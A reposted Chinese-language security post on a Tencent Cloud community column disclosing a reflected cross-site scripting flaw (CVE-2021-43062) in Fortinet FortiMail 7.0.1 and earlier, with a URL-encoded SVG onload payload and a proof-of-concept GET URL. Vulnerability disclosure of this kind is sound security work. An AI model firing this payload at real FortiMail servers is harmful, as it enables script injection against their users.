前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Fortinet Fortimail 7.0.1 跨站脚本

Fortinet Fortimail 7.0.1 跨站脚本

作者头像
Khan安全团队
发布2022-03-03 09:32:53
4700
发布2022-03-03 09:32:53
举报
文章被收录于专栏:Khan安全团队

# 软件链接:https://fortimail.fortidemo.com/m/webmail/(厂商在线演示)

# 版本:

# FortiMail 7.0.1 及以下版本

# FortiMail 6.4.5 及以下版本

# FortiMail 6.2.7 及以下版本

# CVE:CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)

一、说明:

FortiMail 中的网页生成漏洞(“跨站点脚本”)[CWE-79] 期间输入的不当无效化可能允许未经身份验证的攻击者通过对 FortiGuard URI 保护服务的精心制作的 HTTP GET 请求执行 XSS 攻击。

2. 负载:https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E

3. 概念证明:

https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
图像处理
图像处理基于腾讯云深度学习等人工智能技术,提供综合性的图像优化处理服务,包括图像质量评估、图像清晰度增强、图像智能裁剪等。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档